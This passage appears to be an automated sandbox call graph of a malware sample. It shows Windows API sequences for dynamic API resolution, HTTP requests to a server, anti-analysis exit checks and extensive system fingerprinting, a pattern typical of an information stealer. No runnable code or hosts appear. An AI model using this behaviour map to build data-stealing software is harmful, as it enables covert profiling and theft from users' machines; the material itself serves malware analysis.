14660->14661 14662 b7418f 14661->14662 14663 b745c0 2 API calls 14662->14663 14664 b741a8 14663->14664 14665 b745c0 2 API calls 14664->14665 14666 b741c1 14665->14666 14667 b745c0 2 API calls 14666->14667 14668 b741da 14667->14668 14669 b745c0 2 API calls 14668->14669 14670 b741f3 14669->14670 14671 b745c0 2 API calls 14670->14671 14672 b7420c 14671->14672 14673 b745c0 2 API calls 14672->14673 14674 b74225 14673->14674 14675 b745c0 2 API calls 14674->14675 14676 b7423e 14675->14676 14677 b745c0 2 API calls 14676->14677 14678 b74257 14677->14678 14679 b745c0 2 API calls 14678->14679 14680 b74270 14679->14680 14681 b745c0 2 API calls 14680->14681 14682 b74289 14681->14682 14683 b745c0 2 API calls 14682->14683 14684 b742a2 14683->14684 14685 b745c0 2 API calls 14684->14685 14686 b742bb 14685->14686 14687 b745c0 2 API calls 14686->14687 14688 b742d4 14687->14688 14689 b745c0 2 API calls 14688->14689 14690 b742ed 14689->14690 14691 b745c0 2 API calls 14690->14691 14692 b74306 14691->14692 14693 b745c0 2 API calls 14692->14693 14694 b7431f 14693->14694 14695 b745c0 2 API calls 14694->14695 14696 b74338 14695->14696 14697 b745c0 2 API calls 14696->14697 14698 b74351 14697->14698 14699 b745c0 2 API calls 14698->14699 14700 b7436a 14699->14700 14701 b745c0 2 API calls 14700->14701 14702 b74383 14701->14702 14703 b745c0 2 API calls 14702->14703 14704 b7439c 14703->14704 14705 b745c0 2 API calls 14704->14705 14706 b743b5 14705->14706 14707 b745c0 2 API calls 14706->14707 14708 b743ce 14707->14708 14709 b745c0 2 API calls 14708->14709 14710 b743e7 14709->14710 14711 b745c0 2 API calls 14710->14711 14712 b74400 14711->14712 14713 b745c0 2 API calls 14712->14713 14714 b74419 14713->14714 14715 b745c0 2 API calls 14714->14715 14716 b74432 14715->14716 14717 b745c0 2 API calls 14716->14717 14718 b7444b 14717->14718 14719 b745c0 2 API calls 14718->14719 14720 b74464 14719->14720 14721 b745c0 2 API calls 14720->14721 14722 b7447d 14721->14722 14723 b745c0 2 API calls 14722->14723 14724 b74496 14723->14724 14725 b745c0 2 API calls 14724->14725 14726 b744af 14725->14726 14727 b745c0 2 API calls 14726->14727 14728 b744c8 14727->14728 14729 b745c0 2 API calls 14728->14729 14730 b744e1 14729->14730 14731 b745c0 2 API calls 14730->14731 14732 b744fa 14731->14732 14733 b745c0 2 API calls 14732->14733 14734 b74513 14733->14734 14735 b745c0 2 API calls 14734->14735 14736 b7452c 14735->14736 14737 b745c0 2 API calls 14736->14737 14738 b74545 14737->14738 14739 b745c0 2 API calls 14738->14739 14740 b7455e 14739->14740 14741 b745c0 2 API calls 14740->14741 14742 b74577 14741->14742 14743 b745c0 2 API calls 14742->14743 14744 b74590 14743->14744 14745 b745c0 2 API calls 14744->14745 14746 b745a9 14745->14746 14747 b89c10 14746->14747 14748 b89c20 43 API calls 14747->14748 14749 b8a036 8 API calls 14747->14749 14748->14749 14750 b8a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14749->14750 14751 b8a146 14749->14751 14750->14751 14752 b8a153 8 API calls 14751->14752 14753 b8a216 14751->14753 14752->14753 14754 b8a298 14753->14754 14755 b8a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14753->14755 14756 b8a2a5 6 API calls 14754->14756 14757 b8a337 14754->14757 14755->14754 14756->14757 14758 b8a41f 14757->14758 14759 b8a344 9 API calls 14757->14759 14760 b8a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14758->14760 14761 b8a4a2 14758->14761 14759->14758 14760->14761 14762 b8a4ab GetProcAddress GetProcAddress 14761->14762 14763 b8a4dc 14761->14763 14762->14763 14764 b8a515 14763->14764 14765 b8a4e5 GetProcAddress GetProcAddress 14763->14765 14766 b8a612 14764->14766 14767 b8a522 10 API calls 14764->14767 14765->14764 14768 b8a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14766->14768 14769 b8a67d 14766->14769 14767->14766 14768->14769 14770 b8a69e 14769->14770 14771 b8a686 GetProcAddress 14769->14771 14772 b85ca3 14770->14772 14773 b8a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14770->14773 14771->14770 14774 b71590 14772->14774 14773->14772 15895 b71670 14774->15895 14777 b8a7a0 lstrcpy 14778 b715b5 14777->14778 14779 b8a7a0 lstrcpy 14778->14779 14780 b715c7 14779->14780 14781 b8a7a0 lstrcpy 14780->14781 14782 b715d9 14781->14782 14783 b8a7a0 lstrcpy 14782->14783 14784 b71663 14783->14784 14785 b85510 14784->14785 14786 b85521 14785->14786 14787 b8a820 2 API calls 14786->14787 14788 b8552e 14787->14788 14789 b8a820 2 API calls 14788->14789 14790 b8553b 14789->14790 14791 b8a820 2 API calls 14790->14791 14792 b85548 14791->14792 14793 b8a740 lstrcpy 14792->14793 14794 b85555 14793->14794 14795 b8a740 lstrcpy 14794->14795 14796 b85562 14795->14796 14797 b8a740 lstrcpy 14796->14797 14798 b8556f 14797->14798 14799 b8a740 lstrcpy 14798->14799 14839 b8557c 14799->14839 14800 b8a740 lstrcpy 14800->14839 14801 b85643 StrCmpCA 14801->14839 14802 b856a0 StrCmpCA 14803 b857dc 14802->14803 14802->14839 14804 b8a8a0 lstrcpy 14803->14804 14805 b857e8 14804->14805 14806 b8a820 2 API calls 14805->14806 14808 b857f6 14806->14808 14807 b8a820 lstrlen lstrcpy 14807->14839 14810 b8a820 2 API calls 14808->14810 14809 b85856 StrCmpCA 14811 b85991 14809->14811 14809->14839 14813 b85805 14810->14813 14812 b8a8a0 lstrcpy 14811->14812 14814 b8599d 14812->14814 14815 b71670 lstrcpy 14813->14815 14816 b8a820 2 API calls 14814->14816 14836 b85811 14815->14836 14817 b859ab 14816->14817 14819 b8a820 2 API calls 14817->14819 14818 b85a0b StrCmpCA 14820 b85a28 14818->14820 14821 b85a16 Sleep 14818->14821 14822 b859ba 14819->14822 14823 b8a8a0 lstrcpy 14820->14823 14821->14839 14824 b71670 lstrcpy 14822->14824 14825 b85a34 14823->14825 14824->14836 14826 b8a820 2 API calls 14825->14826 14827 b85a43 14826->14827 14829 b8a820 2 API calls 14827->14829 14828 b852c0 25 API calls 14828->14839 14830 b85a52 14829->14830 14833 b71670 lstrcpy 14830->14833 14831 b8a8a0 lstrcpy 14831->14839 14832 b8578a StrCmpCA 14832->14839 14833->14836 14834 b8a7a0 lstrcpy 14834->14839 14835 b8593f StrCmpCA 14835->14839 14836->13892 14837 b851f0 20 API calls 14837->14839 14838 b71590 lstrcpy 14838->14839 14839->14800 14839->14801 14839->14802 14839->14807 14839->14809 14839->14818 14839->14828 14839->14831 14839->14832 14839->14834 14839->14835 14839->14837 14839->14838 14841 b8754c 14840->14841 14842 b87553 GetVolumeInformationA 14840->14842 14841->14842 14843 b87591 14842->14843 14844 b875fc GetProcessHeap RtlAllocateHeap 14843->14844 14845 b87628 wsprintfA 14844->14845 14846 b87619 14844->14846 14848 b8a740 lstrcpy 14845->14848 14847 b8a740 lstrcpy 14846->14847 14849 b85da7 14847->14849 14848->14849 14849->13913 14851 b8a7a0 lstrcpy 14850->14851 14852 b74899 14851->14852 15904 b747b0 14852->15904 14854 b748a5 14855 b8a740 lstrcpy 14854->14855 14856 b748d7 14855->14856 14857 b8a740 lstrcpy 14856->14857 14858 b748e4 14857->14858 14859 b8a740 lstrcpy 14858->14859 14860 b748f1 14859->14860 14861 b8a740 lstrcpy 14860->14861 14862 b748fe 14861->14862 14863 b8a740 lstrcpy 14862->14863 14864 b7490b InternetOpenA StrCmpCA 14863->14864 14865 b74944 14864->14865 14866 b74ecb InternetCloseHandle 14865->14866 15910 b88b60 14865->15910 14867 b74ee8 14866->14867 15925 b79ac0 CryptStringToBinaryA 14867->15925 14869 b74963 15918 b8a920 14869->15918 14872 b74976 14873 b8a8a0 lstrcpy 14872->14873 14879 b7497f 14873->14879 14875 b8a820 2 API calls 14876 b74f05 14875->14876 14878 b8a9b0 4 API calls 14876->14878 14877 b74f27 ctype 14881 b8a7a0 lstrcpy 14877->14881 14880 b74f1b 14878->14880 14883 b8a9b0 4 API calls 14879->14883 14882 b8a8a0 lstrcpy 14880->14882 14894 b74f57 14881->14894 14882->14877 14884 b749a9 14883->14884 14885 b8a8a0 lstrcpy 14884->14885 14886 b749b2 14885->14886 14887 b8a9b0 4 API calls 14886->14887 14888 b749d1 14887->14888 14889 b8a8a0 lstrcpy 14888->14889 14890 b749da 14889->14890 14891 b8a920 3 API calls 14890->14891 14892 b749f8 14891->14892 14893 b8a8a0 lstrcpy 14892->14893 14895 b74a01 14893->14895 14894->13916 14896 b8a9b0 4 API calls 14895->14896 14897 b74a20 14896->14897 14898 b8a8a0 lstrcpy 14897->14898 14899 b74a29 14898->14899 14900 b8a9b0 4 API calls 14899->14900 14901 b74a48 14900->14901 14902 b8a8a0 lstrcpy 14901->14902 14903 b74a51 14902->14903 14904 b8a9b0 4 API calls 14903->14904 14905 b74a7d 14904->14905 14906 b8a920 3 API calls 14905->14906 14907 b74a84 14906->14907 14908 b8a8a0 lstrcpy 14907->14908 14909 b74a8d 14908->14909 14910 b74aa3 InternetConnectA 14909->14910 14910->14866 14911 b74ad3 HttpOpenRequestA 14910->14911 14913 b74ebe InternetCloseHandle 14911->14913 14914 b74b28 14911->14914 14913->14866 14915 b8a9b0 4 API calls 14914->14915 14916 b74b3c 14915->14916 14917 b8a8a0 lstrcpy 14916->14917 14918 b74b45 14917->14918 14919 b8a920 3 API calls 14918->14919 14920 b74b63 14919->14920 14921 b8a8a0 lstrcpy 14920->14921 14922 b74b6c 14921->14922 14923 b8a9b0 4 API calls 14922->14923 14924 b74b8b 14923->14924 14925 b8a8a0 lstrcpy 14924->14925 14926 b74b94 14925->14926 14927 b8a9b0 4 API calls 14926->14927 14928 b74bb5 14927->14928 14929 b8a8a0 lstrcpy 14928->14929 14930 b74bbe 14929->14930 14931 b8a9b0 4 API calls 14930->14931 14932 b74bde 14931->14932 14933 b8a8a0 lstrcpy 14932->14933 14934 b74be7 14933->14934 14935 b8a9b0 4 API calls 14934->14935 14936 b74c06 14935->14936 14937 b8a8a0 lstrcpy 14936->14937 14938 b74c0f 14937->14938 14939 b8a920 3 API calls 14938->14939 14940 b74c2d 14939->14940 14941 b8a8a0 lstrcpy 14940->14941 14942 b74c36 14941->14942 14943 b8a9b0 4 API calls 14942->14943 14944 b74c55 14943->14944 14945 b8a8a0 lstrcpy 14944->14945 14946 b74c5e 14945->14946 14947 b8a9b0 4 API calls 14946->14947 14948 b74c7d 14947->14948 14949 b8a8a0 lstrcpy 14948->14949 14950 b74c86 14949->14950 14951 b8a920 3 API calls 14950->14951 14952 b74ca4 14951->14952 14953 b8a8a0 lstrcpy 14952->14953 14954 b74cad 14953->14954 14955 b8a9b0 4 API calls 14954->14955 14956 b74ccc 14955->14956 14957 b8a8a0 lstrcpy 14956->14957 14958 b74cd5 14957->14958 14959 b8a9b0 4 API calls 14958->14959 14960 b74cf6 14959->14960 14961 b8a8a0 lstrcpy 14960->14961 14962 b74cff 14961->14962 14963 b8a9b0 4 API calls 14962->14963 14964 b74d1f 14963->14964 14965 b8a8a0 lstrcpy 14964->14965 14966 b74d28 14965->14966 14967 b8a9b0 4 API calls 14966->14967 14968 b74d47 14967->14968 14969 b8a8a0 lstrcpy 14968->14969 14970 b74d50 14969->14970 14971 b8a920 3 API calls 14970->14971 14972 b74d6e 14971->14972 14973 b8a8a0 lstrcpy 14972->14973 14974 b74d77 14973->14974 14975 b8a740 lstrcpy 14974->14975 14976 b74d92 14975->14976 14977 b8a920 3 API calls 14976->14977 14978 b74db3 14977->14978 14979 b8a920 3 API calls 14978->14979 14980 b74dba 14979->14980 14981 b8a8a0 lstrcpy 14980->14981 14982 b74dc6 14981->14982 14983 b74de7 lstrlen 14982->14983 14984 b74dfa 14983->14984 14985 b74e03 lstrlen 14984->14985 15924 b8aad0 14985->15924 14987 b74e13 HttpSendRequestA 14988 b74e32 InternetReadFile 14987->14988 14989 b74e67 InternetCloseHandle 14988->14989 14994 b74e5e 14988->14994 14992 b8a800 14989->14992 14991 b8a9b0 4 API calls 14991->14994 14992->14913 14993 b8a8a0 lstrcpy 14993->14994 14994->14988 14994->14989 14994->14991 14994->14993 15931 b8aad0 14995->15931 14997 b817c4 StrCmpCA 14998 b817cf ExitProcess 14997->14998 14999 b817d7 14997->14999 15000 b819c2 14999->15000 15001 b8185d StrCmpCA 14999->15001 15002 b8187f StrCmpCA 14999->15002 15003 b81970 StrCmpCA 14999->15003 15004 b818f1 StrCmpCA 14999->15004 15005 b81951 StrCmpCA 14999->15005 15006 b81932 StrCmpCA 14999->15006 15007 b81913 StrCmpCA 14999->15007 15008 b818ad StrCmpCA 14999->15008 15009 b818cf StrCmpCA 14999->15009 15010 b8a820 lstrlen lstrcpy 14999->15010 15000->13918 15001->14999 15002->14999 15003->14999 15004->14999 15005->14999 15006->14999 15007->14999 15008->14999 15009->14999 15010->14999 15012 b8a7a0 lstrcpy 15011->15012 15013 b75979 15012->15013 15014 b747b0 2 API calls 15013->15014 15015 b75985 15014->15015 15016 b8a740 lstrcpy 15015->15016 15017 b759ba 15016->15017 15018 b8a740 lstrcpy 15017->15018 15019 b759c7 15018->15019 15020 b8a740 lstrcpy 15019->15020 15021 b759d4 15020->15021 15022 b8a740 lstrcpy 15021->15022 15023 b759e1 15022->15023 15024 b8a740 lstrcpy 15023->15024 15025 b759ee InternetOpenA StrCmpCA 15024->15025 15026 b75a1d 15025->15026 15027 b75fc3 InternetCloseHandle 15026->15027 15028 b88b60 3 API calls 15026->15028 15029 b75fe0 15027->15029 15030 b75a3c 15028->15030 15032 b79ac0 4 API calls 15029->15032 15031 b8a920 3 API calls 15030->15031 15033 b75a4f 15031->15033 15034 b75fe6 15032->15034 15035 b8a8a0 lstrcpy 15033->15035 15036 b8a820 2 API calls 15034->15036 15038 b7601f ctype 15034->15038 15040 b75a58 15035->15040 15037 b75ffd 15036->15037 15039 b8a9b0 4 API calls 15037->15039 15043 b8a7a0 lstrcpy 15038->15043 15041 b76013 15039->15041 15044 b8a9b0 4 API calls 15040->15044 15042 b8a8a0 lstrcpy 15041->15042 15042->15038 15052 b7604f 15043->15052 15045 b75a82 15044->15045 15046 b8a8a0 lstrcpy 15045->15046 15047 b75a8b 15046->15047 15048 b8a9b0 4 API calls 15047->15048 15049 b75aaa 15048->15049 15050 b8a8a0 lstrcpy 15049->15050 15051 b75ab3 15050->15051 15053 b8a920 3 API calls 15051->15053 15052->13924 15054 b75ad1 15053->15054 15055 b8a8a0 lstrcpy 15054->15055 15056 b75ada 15055->15056 15057 b8a9b0 4 API calls 15056->15057 15058 b75af9 15057->15058 15059 b8a8a0 lstrcpy 15058->15059 15060 b75b02 15059->15060 15061 b8a9b0 4 API calls 15060->15061 15062 b75b21 15061->15062 15063 b8a8a0 lstrcpy 15062->15063 15064 b75b2a 15063->15064 15065 b8a9b0 4 API calls 15064->15065 15066 b75b56 15065->15066 15067 b8a920 3 API calls 15066->15067 15068 b75b5d 15067->15068 15069 b8a8a0 lstrcpy 15068->15069 15070 b75b66 15069->15070 15071 b75b7c InternetConnectA 15070->15071 15071->15027 15072 b75bac HttpOpenRequestA 15071->15072 15074 b75fb6 InternetCloseHandle 15072->15074 15075 b75c0b 15072->15075 15074->15027 15076 b8a9b0 4 API calls 15075->15076 15077 b75c1f 15076->15077 15078 b8a8a0 lstrcpy 15077->15078 15079 b75c28 15078->15079 15080 b8a920 3 API calls 15079->15080 15081 b75c46 15080->15081 15082 b8a8a0 lstrcpy 15081->15082 15083 b75c4f 15082->15083 15084 b8a9b0 4 API calls 15083->15084 15085 b75c6e 15084->15085 15086 b8a8a0 lstrcpy 15085->15086 15087 b75c77 15086->15087 15088 b8a9b0 4 API calls 15087->15088 15089 b75c98 15088->15089 15090 b8a8a0 lstrcpy 15089->15090 15091 b75ca1 15090->15091 15092 b8a9b0 4 API calls 15091->15092 15093 b75cc1 15092->15093 15094 b8a8a0 lstrcpy 15093->15094 15095 b75cca 15094->15095 15096 b8a9b0 4 API calls 15095->15096 15097 b75ce9 15096->15097 15098 b8a8a0 lstrcpy 15097->15098 15099 b75cf2 15098->15099 15100 b8a920 3 API calls 15099->15100 15101 b75d10 15100->15101 15102 b8a8a0 lstrcpy 15101->15102 15103 b75d19 15102->15103 15104 b8a9b0 4 API calls 15103->15104 15105 b75d38 15104->15105 15106 b8a8a0 lstrcpy 15105->15106 15107 b75d41 15106->15107 15108 b8a9b0 4 API calls 15107->15108 15109 b75d60 15108->15109 15110 b8a8a0 lstrcpy 15109->15110 15111 b75d69 15110->15111 15112 b8a920 3 API calls 15111->15112 15113 b75d87 15112->15113 15114 b8a8a0 lstrcpy 15113->15114 15115 b75d90 15114->15115 15116 b8a9b0 4 API calls 15115->15116 15117 b75daf 15116->15117 15118 b8a8a0 lstrcpy 15117->15118 15119 b75db8 15118->15119 15120 b8a9b0 4 API calls 15119->15120 15121 b75dd9 15120->15121 15122 b8a8a0 lstrcpy 15121->15122 15123 b75de2 15122->15123 15124 b8a9b0 4 API calls 15123->15124 15125 b75e02 15124->15125 15126 b8a8a0 lstrcpy 15125->15126 15127 b75e0b 15126->15127 15128 b8a9b0 4 API calls 15127->15128 15129 b75e2a 15128->15129 15130 b8a8a0 lstrcpy 15129->15130 15131 b75e33 15130->15131 15132 b8a920 3 API calls 15131->15132 15133 b75e54 15132->15133 15134 b8a8a0 lstrcpy 15133->15134 15135 b75e5d 15134->15135 15136 b75e70 lstrlen 15135->15136 15932 b8aad0 15136->15932 15138 b75e81 lstrlen GetProcessHeap RtlAllocateHeap 15933 b8aad0 15138->15933 15140 b75eae lstrlen 15141 b75ebe 15140->15141 15142 b75ed7 lstrlen 15141->15142 15143 b75ee7 15142->15143 15144 b75ef0 lstrlen 15143->15144 15145 b75f03 15144->15145 15146 b75f1a lstrlen 15145->15146 15934 b8aad0 15146->15934 15148 b75f2a HttpSendRequestA 15149 b75f35 InternetReadFile 15148->15149 15150 b75f6a InternetCloseHandle 15149->15150 15154 b75f61 15149->15154 15150->15074 15152 b8a9b0 4 API calls 15152->15154 15153 b8a8a0 lstrcpy 15153->15154 15154->15149 15154->15150 15154->15152 15154->15153 15157 b81077 15155->15157 15156 b81151 15156->13926 15157->15156 15158 b8a820 lstrlen lstrcpy 15157->15158 15158->15157 15160 b80db7 15159->15160 15161 b80f17 15160->15161 15162 b80ea4 StrCmpCA 15160->15162 15163 b80e27 StrCmpCA 15160->15163 15164 b80e67 StrCmpCA 15160->15164 15165 b8a820 lstrlen lstrcpy 15160->15165 15161->13934 15162->15160 15163->15160 15164->15160 15165->15160 15167 b80f67 15166->15167 15168 b81044 15167->15168 15169 b80fb2 StrCmpCA 15167->15169 15170 b8a820 lstrlen lstrcpy 15167->15170 15168->13942 15169->15167 15170->15167 15172 b8a740 lstrcpy 15171->15172 15173 b81a26 15172->15173 15174 b8a9b0 4 API calls 15173->15174 15175 b81a37 15174->15175 15176 b8a8a0 lstrcpy 15175->15176 15177 b81a40 15176->15177 15178 b8a9b0 4 API calls 15177->15178 15179 b81a5b 15178->15179 15180 b8a8a0 lstrcpy 15179->15180 15181 b81a64 15180->15181 15182 b8a9b0 4 API calls 15181->15182 15183 b81a7d 15182->15183 15184 b8a8a0 lstrcpy 15183->15184 15185 b81a86 15184->15185 15186 b8a9b0 4 API calls 15185->15186 15187 b81aa1 15186->15187 15188 b8a8a0 lstrcpy 15187->15188 15189 b81aaa 15188->15189 15190 b8a9b0 4 API calls 15189->15190 15191 b81ac3 15190->15191 15192 b8a8a0 lstrcpy 15191->15192 15193 b81acc 15192->15193 15194 b8a9b0 4 API calls 15193->15194 15195 b81ae7 15194->15195 15196 b8a8a0 lstrcpy 15195->15196 15197 b81af0 15196->15197 15198 b8a9b0 4 API calls 15197->15198 15199 b81b09 15198->15199 15200 b8a8a0 lstrcpy 15199->15200 15201 b81b12 15200->15201 15202 b8a9b0 4 API calls 15201->15202 15203 b81b2d 15202->15203 15204 b8a8a0 lstrcpy 15203->15204 15205 b81b36 15204->15205 15206 b8a9b0 4 API calls 15205->15206 15207 b81b4f 15206->15207 15208 b8a8a0 lstrcpy 15207->15208 15209 b81b58 15208->15209 15210 b8a9b0 4 API calls 15209->15210 15211 b81b76 15210->15211 15212 b8a8a0 lstrcpy 15211->15212 15213 b81b7f 15212->15213 15214 b87500 6 API calls 15213->15214 15215 b81b96 15214->15215 15216 b8a920 3 API calls 15215->15216 15217 b81ba9 15216->15217 15218 b8a8a0 lstrcpy 15217->15218 15219 b81bb2 15218->15219 15220 b8a9b0 4 API calls 15219->15220 15221 b81bdc 15220->15221 15222 b8a8a0 lstrcpy 15221->15222 15223 b81be5 15222->15223 15224 b8a9b0 4 API calls 15223->15224 15225 b81c05 15224->15225 15226 b8a8a0 lstrcpy 15225->15226 15227 b81c0e 15226->15227 15935 b87690 GetProcessHeap RtlAllocateHeap 15227->15935 15230 b8a9b0 4 API calls 15231 b81c2e 15230->15231 15232 b8a8a0 lstrcpy 15231->15232 15233 b81c37 15232->15233 15234 b8a9b0 4 API calls 15233->15234 15235 b81c56 15234->15235 15236 b8a8a0 lstrcpy 15235->15236 15237 b81c5f 15236->15237 15238 b8a9b0 4 API calls 15237->15238 15239 b81c80 15238->15239 15240 b8a8a0 lstrcpy 15239->15240 15241 b81c89 15240->15241 15942 b877c0 GetCurrentProcess IsWow64Process 15241->15942 15244 b8a9b0 4 API calls 15245 b81ca9 15244->15245 15246 b8a8a0 lstrcpy 15245->15246 15247 b81cb2 15246->15247 15248 b8a9b0 4 API calls 15247->15248 15249 b81cd1 15248->15249 15250 b8a8a0 lstrcpy 15249->15250 15251 b81cda 15250->15251 15252 b8a9b0 4 API calls 15251->15252 15253 b81cfb 15252->15253 15254 b8a8a0 lstrcpy 15253->15254 15255 b81d04 15254->15255 15256 b87850 3 API calls 15255->15256 15257 b81d14 15256->15257 15258 b8a9b0 4 API calls 15257->15258 15259 b81d24 15258->15259 15260 b8a8a0 lstrcpy 15259->15260 15261 b81d2d 15260->15261 15262 b8a9b0 4 API calls 15261->15262 15263 b81d4c 15262->15263 15264 b8a8a0 lstrcpy 15263->15264 15265 b81d55 15264->15265 15266 b8a9b0 4 API calls 15265->15266 15267 b81d75 15266->15267 15268 b8a8a0 lstrcpy 15267->15268 15269 b81d7e 15268->15269 15270 b878e0 3 API calls 15269->15270 15271 b81d8e 15270->15271 15272 b8a9b0 4 API calls 15271->15272 15273 b81d9e 15272->15273 15274 b8a8a0 lstrcpy 15273->15274 15275 b81da7 15274->15275 15276 b8a9b0 4 API calls 15275->15276 15277 b81dc6 15276->15277 15278 b8a8a0 lstrcpy 15277->15278 15279 b81dcf 15278->15279 15280 b8a9b0 4 API calls 15279->15280 15281 b81df0 15280->15281 15282 b8a8a0 lstrcpy 15281->15282 15283 b81df9 15282->15283 15944 b87980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15283->15944 15286 b8a9b0 4 API calls 15287 b81e19 15286->15287 15288 b8a8a0 lstrcpy 15287->15288 15289 b81e22 15288->15289 15290 b8a9b0 4 API calls 15289->15290 15291 b81e41 15290->15291 15292 b8a8a0 lstrcpy 15291->15292 15293 b81e4a 15292->15293 15294 b8a9b0 4 API calls 15293->15294 15295 b81e6b 15294->15295 15296 b8a8a0 lstrcpy 15295->15296 15297 b81e74 15296->15297 15946 b87a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15297->15946 15300 b8a9b0 4 API calls 15301 b81e94 15300->15301 15302 b8a8a0 lstrcpy 15301->15302 15303 b81e9d 15302->15303 15304 b8a9b0 4 API calls 15303->15304 15305 b81ebc 15304->15305 15306 b8a8a0 lstrcpy 15305->15306 15307 b81ec5 15306->15307 15308 b8a9b0 4 API calls 15307->15308 15309 b81ee5 15308->15309 15310 b8a8a0 lstrcpy 15309->15310 15311 b81eee 15310->15311 15949 b87b00 GetUserDefaultLocaleName 15311->15949 15314 b8a9b0 4 API calls 15315 b81f0e 15314->15315 15316 b8a8a0 lstrcpy 15315->15316 15317 b81f17 15316->15317 15318 b8a9b0 4 API calls 15317->15318 15319 b81f36 15318->15319 15320 b8a8a0 lstrcpy 15319->15320 15321 b81f3f 15320->15321 15322 b8a9b0 4 API calls 15321->15322 15323 b81f60 15322->15323 15324 b8a8a0 lstrcpy 15323->15324 15325 b81f69 15324->15325 15953 b87b90 15325->15953 15327 b81f80 15328 b8a920 3 API calls 15327->15328 15329 b81f93 15328->15329 15330 b8a8a0 lstrcpy 15329->15330 15331 b81f9c 15330->15331 15332 b8a9b0 4 API calls 15331->15332 15333 b81fc6 15332->15333 15334 b8a8a0 lstrcpy 15333->15334 15335 b81fcf 15334->15335 15336 b8a9b0 4 API calls 15335->15336 15337 b81fef 15336->15337 15338 b8a8a0 lstrcpy 15337->15338 15339 b81ff8 15338->15339 15965 b87d80 GetSystemPowerStatus 15339->15965 15342 b8a9b0 4 API calls 15343 b82018 15342->15343 15344 b8a8a0 lstrcpy 15343->15344 15345 b82021 15344->15345 15346 b8a9b0 4 API calls 15345->15346 15347 b82040 15346->15347 15348 b8a8a0 lstrcpy 15347->15348 15349 b82049 15348->15349 15350 b8a9b0 4 API calls 15349->15350 15351 b8206a 15350->15351 15352 b8a8a0 lstrcpy 15351->15352 15353 b82073 15352->15353 15354 b8207e GetCurrentProcessId 15353->15354 15967 b89470 OpenProcess 15354->15967 15357 b8a920 3 API calls 15358 b820a4 15357->15358 15359 b8a8a0 lstrcpy 15358->15359 15360 b820ad 15359->15360 15361 b8a9b0 4 API calls 15360->15361 15362 b820d7 15361->15362 15363 b8a8a0 lstrcpy 15362->15363 15364 b820e0 15363->15364 15365 b8a9b0 4 API calls 15364->15365 15366 b82100 15365->15366 15367 b8a8a0 lstrcpy 15366->15367 15368 b82109 15367->15368 15972 b87e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15368->15972 15371 b8a9b0 4 API calls 15372 b82129 15371->15372 15373 b8a8a0 lstrcpy 15372->15373 15374 b82132 15373->15374 15375 b8a9b0 4 API calls 15374->15375 15376 b82151 15375->15376 15377 b8a8a0 lstrcpy 15376->15377 15378 b8215a 15377->15378 15379 b8a9b0 4 API calls 15378->15379 15380 b8217b 15379->15380 15381 b8a8a0 lstrcpy 15380->15381 15382 b82184 15381->15382 15976 b87f60 15382->15976 15385 b8a9b0 4 API calls 15386 b821a4 15385->15386 15387 b8a8a0 lstrcpy 15386->15387 15388 b821ad 15387->15388 15389 b8a9b0 4 API calls 15388->15389 15390 b821cc 15389->15390 15391 b8a8a0 lstrcpy 15390->15391 15392 b821d5 15391->15392 15393 b8a9b0 4 API calls 15392->15393 15394 b821f6 15393->15394 15395 b8a8a0 lstrcpy 15394->15395 15396 b821ff 15395->15396 15989 b87ed0 GetSystemInfo wsprintfA 15396->15989 15399 b8a9b0 4 API calls 15400 b8221f 15399->15400 15401 b8a8a0 lstrcpy 15400->15401 15402 b82228 15401->15402 15403 b8a9b0 4 API calls 15402->15403 15404 b82247 15403->15404 15405 b8a8a0 lstrcpy 15404->15405 15406 b82250 15405->15406 15407 b8a9b0 4 API calls 15406->15407 15408 b82270 15407->15408 15409 b8a8a0 lstrcpy 15408->15409 15410 b82279 15409->15410 15991 b88100 GetProcessHeap RtlAllocateHeap 15410->15991 15413 b8a9b0 4 API calls 15414 b82299 15413->15414 15415 b8a8a0 lstrcpy 15414->15415 15416 b822a2 15415->15416 15417 b8a9b0 4 API calls 15416->15417 15418 b822c1 15417->15418 15419 b8a8a0 lstrcpy 15418->15419 15420 b822ca 15419->15420 15421 b8a9b0 4 API calls 15420->15421 15422 b822eb 15421->15422 15423 b8a8a0 lstrcpy 15422->15423 15424 b822f4 15423->15424 15997 b887c0 15424->15997 15427 b8a920 3 API calls 15428 b8231e 15427->15428 15429 b8a8a0 lstrcpy 15428->15429 15430 b82327 15429->15430 15431 b8a9b0 4 API calls 15430->15431 15432 b82351 15431->15432 15433 b8a8a0 lstrcpy 15432->15433 15434 b8235a 15433->15434 15435 b8a9b0 4 API calls 15434->15435 15436 b8237a 15435->15436 15437 b8a8a0 lstrcpy 15436->15437 15438 b82383 15437->15438 15439 b8a9b0 4 API calls 15438->15439 15440 b823a2 15439->15440 15441 b8a8a0 lstrcpy 15440->15441 15442 b823ab 15441->15442 16002 b881f0 15442->16002 15444 b823c2 15445 b8a920 3 API calls 15444->15445 15446 b823d5 15445->15446 15447 b8a8a0 lstrcpy 15446->15447 15448 b823de 15447->15448 15449 b8a9b0 4 API calls 15448->15449 15450 b8240a 15449->15450 15451 b8a8a0 lstrcpy 15450->15451 15452 b82413 15451->15452 15453 b8a9b0 4 API calls 15452->15453 15454 b82432 15453->15454 15455 b8a8a0 lstrcpy 15454->15455 15456 b8243b 15455->15456 15457 b8a9b0 4 API calls 15456->15457 15458 b8245c 15457->15458 15459 b8a8a0 lstrcpy 15458->15459 15460 b82465 15459->15460 15461 b8a9b0 4 API calls 15460->15461 15462 b82484 15461->15462 15463 b8a8a0 lstrcpy 15462->15463 15464 b8248d 15463->15464 15465 b8a9b0 4 API calls 15464->15465 15466 b824ae 15465->15466 15467 b8a8a0 lstrcpy 15466->15467 15468 b824b7 15467->15468 16010 b88320 15468->16010 15470 b824d3 15471 b8a920 3 API calls 15470->15471 15472 b824e6 15471->15472 15473 b8a8a0 lstrcpy 15472->15473 15474 b824ef 15473->15474 15475 b8a9b0 4 API calls 15474->15475 15476 b82519 15475->15476 15477 b8a8a0 lstrcpy 15476->15477 15478 b82522 15477->15478 15479 b8a9b0 4 API calls 15478->15479 15480 b82543 15479->15480 15481 b8a8a0 lstrcpy 15480->15481 15482 b8254c 15481->15482 15483 b88320 17 